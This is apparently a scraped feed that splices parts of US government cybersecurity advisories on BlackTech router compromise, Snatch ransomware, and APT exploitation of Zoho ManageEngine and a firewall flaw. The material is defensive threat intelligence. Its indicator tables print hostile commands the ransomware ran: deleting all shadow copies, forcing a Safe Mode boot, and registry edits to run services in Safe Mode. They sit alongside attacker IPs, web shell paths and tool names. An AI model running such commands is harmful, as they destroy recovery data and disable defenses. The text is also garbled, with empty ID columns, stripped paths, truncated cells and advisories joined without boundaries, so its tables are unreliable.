This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate cyber threats, and to develop and issue cybersecurity specifications and mitigations.
NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
NSA’s Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
U.S. organizations: Report incidents and anomalous activity to CISA 24/7 Operations Center at Report@cisa.dhs.gov, cisa.gov/report, or (888) 282-0870 and/or to the FBI via your local FBI field office.
See Tables 2-9 for all referenced BlackTech tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Obtain Capabilities: Code Signing Certificates |
BlackTech actors use stolen code-signing certificates to sign payloads and evade defenses. |
Technique Title |
ID |
Use |
---|---|---|
Initial Access |
BlackTech actors gain access to victim networks by exploiting routers. |
|
Trusted Relationship |
BlackTech actors exploit trusted domain relationships of routers to gain access to victim networks. |
Technique Title |
ID |
Use |
---|---|---|
Persistence |
BlackTech actors gain persistent access to victims’ networks. |
|
Traffic Signaling |
BlackTech actors send specially crafted packets to enable or disable backdoor functionality on a compromised router. |
|
Pre-OS Boot: ROMMONkit |
BlackTech actors modify router firmware to maintain persistence. |
Technique Title |
ID |
Use |
---|---|---|
Privilege Escalation |
BlackTech actors gain elevated privileges on a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Defense Evasion |
BlackTech actors configure their tools to evade detection by security software and EDR. |
|
Modify Registry |
BlackTech actors modify the victim’s registry. |
|
Impair Defenses |
BlackTech actors disable logging on compromised routers to avoid detection and evade defenses. |
|
Impair Defenses: Impair Command History Logging |
BlackTech actors disable logging on the compromised routers to prevent logging of any commands issued. |
|
Modify System Image: Patch System Image |
BlackTech actors modify router firmware to evade detection. |
Technique Title |
ID |
Use |
---|---|---|
Discovery |
BlackTech actors use SNScan to enumerate victims’ networks and obtain further network information. |
Technique Title |
ID |
Use |
---|---|---|
Remote Services: Remote Desktop Protocol |
BlackTech actors use RDP to move laterally across a victim’s network. |
|
Remote Services: SSH |
BlackTech actors use SSH to move laterally across a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Command and Control |
BlackTech actors compromise and control a victim’s network infrastructure. |
|
Application Layer Protocol: File Transfer Protocols |
BlackTech actors use FTP to move data through a victim’s network or to deliver scripts for compromising routers. |
|
Proxy |
BlackTech actors use compromised routers to proxy traffic. |
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.
Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.
Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]
Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].
Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443
[T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].
Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe
to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe
, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].
Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].
During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe
or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256
hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat
) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004].
The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT
in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.
The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.
Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:
Email Domains |
sezname[.]cz |
cock[.]li |
airmail[.]cc |
Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.
Email Domains |
tutanota[.]com / tutamail[.]com / tuta[.]io |
mail[.]fr |
keemail[.]me |
protonmail[.]com / proton[.]me |
swisscows[.]email |
The email addresses listed in Table 3 were reported by recent victims.
Email Addresses |
---|
TOX Messaging IDs |
---|
CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F |
7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418 |
83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97 |
0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58 NOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond. |
Folder Creation |
---|
C:$SysReset |
Filenames |
SHA-256 |
qesbdksdvnotrjnexutx.bat |
0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f |
eqbglqcngblqnl.bat |
1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d |
safe.exe |
5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd |
safe.exe |
7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3 |
safe.exe |
28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c |
safe.exe |
fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066 |
DefenderControl.exe |
a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae |
PRETTYOCEANApplicationdrs.bi |
6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0 |
Setup.exe |
510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1 |
WRSA.exe |
ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d |
ghnhfglwaplf.bat |
2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57 |
nllraq.bat |
251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d |
ygariiwfenmqteiwcr.bat |
3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924 |
bsfyqgqeauegwyfvtp.bat |
6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7 |
rgibdcghzwpk.bat |
84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5 |
pxyicmajjlqrtgcnhi.bat |
a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84 |
evhgpp.bat |
b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40 |
eqbglqcngblqnl.bat |
1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d |
qesbdksdvnotrjnexutx.bat |
0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f |
HOW TO RESTORE YOUR FILES.TXT |
|
Filenames |
SHA-1 |
safe.exe |
c8a0060290715f266c89a21480fed08133ea2614 |
Commands |
wmiadap.exe /F /T /R |
%windir%System32svchost.eve –k WerSvcGroup |
conhost.exe 0xFFFFFFFF -ForceV1 |
vssadmin delete shadows /all /quiet |
bcdedit.exe /set {current} safeboot minimal |
REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalVSS /VE /T REG_SZ /F /D Service |
REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalmXoRpcSsx /VE /T REG_SZ /F /D Service |
REG QUERY HKLMSYSTEMCurrentControlSetControl /v SystemStartOptions |
%CONHOST% "1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320 |
"C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe" --flag-switches-begin --flag-switches-end --no-startup-window /prefetch:5 |
cmd /d /c cmd /d /c cmd /d /c start " " C:Usersgrade1AppDataLocalPRETTYOCEANluvApplicationPRETTYOCEANApplicationidf.bi. |
Registry Keys |
---|
HKLMSOFTWAREMicrosoftWindows Media Player NSS3.0ServersD8B548F0-E306-4B2B-BD82-25DAC3208786FriendlyName |
HKUS-1-5-21-4270068108-2931534202-3907561125-1001SoftwareMicrosoftWindowsCurrentVersionShell ExtensionsCached{ED50FC29-B964- |
Source |
Message |
TerminalServices-RemoteConnectionManager |
Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated. |
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall |
A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing” |
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall |
A Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”. |
Microsoft-Windows-TaskScheduler%4Operational |
Instance of process C:Windowssvchost.exe. (Incorrect file location, should be C:WindowsSystem32svchost.exe) |
Mutexes Created |
---|
Sessions1BaseNamedObjectsgcc-shmem-tdm2-fc_key |
Sessions1BaseNamedObjectsgcc-shmem-tdm2-sjlj_once |
Sessions1BaseNamedObjectsgcc-shmem-tdm2-use_fc_key |
gcc-shmem-tdm2-fc_key |
gcc-hmem-tdm2-sjlj_once |
gcc-shmem-tdm2-use_fc_key |
See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Gather Victim Network Information |
Snatch threat actors may gather information about the victim's networks that can be used during targeting. |
Technique Title |
ID |
Use |
Acquire Infrastructure: Virtual Private Server |
Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure. |
Technique Title |
ID |
Use |
Valid Accounts |
Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network. |
|
External Remote Services |
Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network. Snatch threat actors use VPN services to connect to a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Command and Scripting Interpreter: Windows Command Shell |
Snatch threat actors may use batch files ( |
|
System Services: Service Execution |
Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used |
Technique Title |
ID |
Use |
---|---|---|
Valid Accounts: Domain Accounts |
Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Masquerading |
Snatch threat actors have the ransomware executable match the |
|
Indicator Removal: File Deletion |
Snatch threat actors delete batch files from a victim’s filesystem once execution is complete. |
|
Modify Registry |
Snatch threat actors modify Windows Registry keys to aid in persistence and execution. |
|
Impair Defenses: Disable or Modify Tools |
Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution. |
|
Impair Defenses: Safe Mode Boot |
Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running. |
Technique Title |
ID |
Use |
---|---|---|
Brute Force: Password Guessing |
Snatch threat actors use brute force to obtain administrator credentials for a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Query Registry |
Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software. |
|
Process Discovery |
Snatch threat actors search for information about running processes on a system. |
Technique Title |
ID |
Use |
---|---|---|
Remote Services: Remote Desktop Protocol |
Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol. |
Technique Title |
ID |
Use |
---|---|---|
Data from Local System |
Snatch threat actors search systems to find files and folders of interest prior to exfiltration. |
Technique Title |
ID |
Use |
---|---|---|
Application Layer Protocols: Web Protocols |
Snatch threat actors establish connections over port |
Technique Title |
ID |
Use |
---|---|---|
Exfiltration |
Snatch threat actors use exfiltration techniques to steal data from a victim’s network. |
Technique Title |
ID |
Use |
Data Encrypted for Impact |
Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. |
|
Inhibit System Recovery |
Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery. |
These mitigations apply to all stakeholders. The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide. |
The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870.
[1] DataBreaches.net
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.
September 20, 2023: Initial version.
]]>The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.
CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.
By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors:
CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both.
As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153
was made as part of initial exploitation.
Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001] named Azure
with administrative privileges [T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization’s network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.
Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity.
Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.
APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002] on Transmission Control Protocol (TCP) port 10443 [T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:
144.202.2[.]71
207.246.105[.]240
45.77.121[.]232
47.90.240[.]218
APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usresource.aspx
c:inetpubwwwrootuninetcssfont-awesomecssdiscover.ashx
c:inetpubwwwrootuninetcssfont-awesomecssconfiglogin.ashx
c:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions15templatelayoutsapproveinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteerrorinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.ashx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userror.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfos.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo-1.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usnew_list.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userrorinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-uslgnbotr.ashx
c:inetpubpasswordchangeLECPNJYRH.aspx
c:inetpubpasswordchange9ehj.aspx
c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservicesinfo.ashx
c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservices.aspx
c:inetpubredirectedSites[REDACTED]productsuns1fw.aspx
c:inetpubredirectedSites[REDACTED]productsuns1ew.aspx
The following IP addresses were identified as associated with the loaded web shells:
45.90.123[.]194
154.6.91[.]26
154.6.93[.]22
154.6.93[.]5
154.6.93[.]12
154.6.93[.]32
154.6.93[.]24
184.170.241[.]27
191.96.106[.]40
102.129.145[.]232
Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).
Timestamp (UTC) |
Event |
Description |
2023-01-18 11:57:02 |
Uniform Resource Identifier (URI): |
|
2023-01-20 |
Attempts made to export three files; associated with malicious IP |
APT actors attempted to export [TA0009], [TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with
Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1. |
2023-01-20 16:51:05 |
Successful web server exploitation via CVE-2022-47966. |
Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966. |
2023-01-21 06:46:42 |
|
A local user account with administrative permissions, named |
2023-01-21 06:49:40 |
LSASS dumped by |
The Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. |
2023-01-21 06:50:59 |
|
The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download Note: ConnectWise ScreenConnect was observed in multiple locations within the organization’s environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of |
2023-01-21 07:34:32 |
|
See MAR-10430311-1.v1 for additional details. |
2023-01-21 08:46:23 |
Mimikatz credential dump files created. |
Two files ( |
2023-01-21 09:25:58 |
Legitimate files/applications |
Note: Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. |
2023-01-21 13:56:14 |
|
APT actors downloaded the file
Note: CISA analyzed these files and did not identify the files as malicious. However, |
2023-01-21 14:02:45 |
Ngrok token created, renamed to ngrok.yml config file, and Remote Desktop Protocol (RDP) connection established. |
Ngrok was used to establish an RDP connection [T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system. At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system. Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. |
2023-01-21 14:31:01 |
SSH tools downloaded to establish reverse (remote) communication. |
Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:
While the files were not identified as malicious, they were loaded for malicious purposes. |
2023-01-21 14:33:11 |
|
Analysis identified |
2023-01-21 14:51:49 |
PsExec executed on the ServiceDesk system. |
Analysis identified evidence and execution of two files ( APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.
Note: PsExec, a command line utility from Microsoft's Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed. |
2023-01-21 14:55:02 |
ProcDump created on the ServiceDesk system. |
ProcDump was created within the |
2023-01-24 15:07:18 |
Apache Log4j exploit attempted against the ServiceDesk system. |
APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:
|
2023-01-25 00:17:33 |
Mimikatz credential dump files created. |
One file ( Note: This is a different path and time associated with Mimikatz than listed above. |
2023-01-29 |
HTTP-GET requests sent to C2 IP |
The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted. |
2023-02-02 05:51:08 |
|
Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]:
Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created See MAR-10430311-1.v1 for additional details. |
2023-02-02 18:45:58 |
Metasploit service installed. |
APT actors installed Metasploit with the following attributes on the organization’s domain controller [T1059.001]:
Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code. |
2023-02-03 03:27:59 |
|
APT actors dropped an additional ASPX web shell on a web server in the following file system location:
See MAR-10430311-1.v1 for additional details. |
2023-02-03 15:12:23 |
|
APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as See MAR-10430311-1.v1 for additional details. |
2023-02-08 08:56:35, 2023-02-09 20:19:59, 2023-03-04, 2023-03-18 |
Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP |
PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:
|
2023-03-06 06:49:40 |
|
APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Destination IP: |
Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.
Tool |
Description |
Observation |
---|---|---|
Mimikatz [2] |
A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. |
In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files:
These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs. |
Ngrok [3] |
Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls. In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6] |
Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems. Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok’s ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors. |
ProcDump |
A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system. |
APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus. |
Metasploit |
Metasploit is an open-source penetration testing software.
|
APT actors’ specific use of Meterpreter—an attack payload of Metasploit—serves as an interactive shell and allows threat actors to control and execute code on a system. |
Interact.sh |
An open-source tool for detecting external interactions (communication).[7] This tool is used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity. |
APT actors likely used |
anydesk.exe |
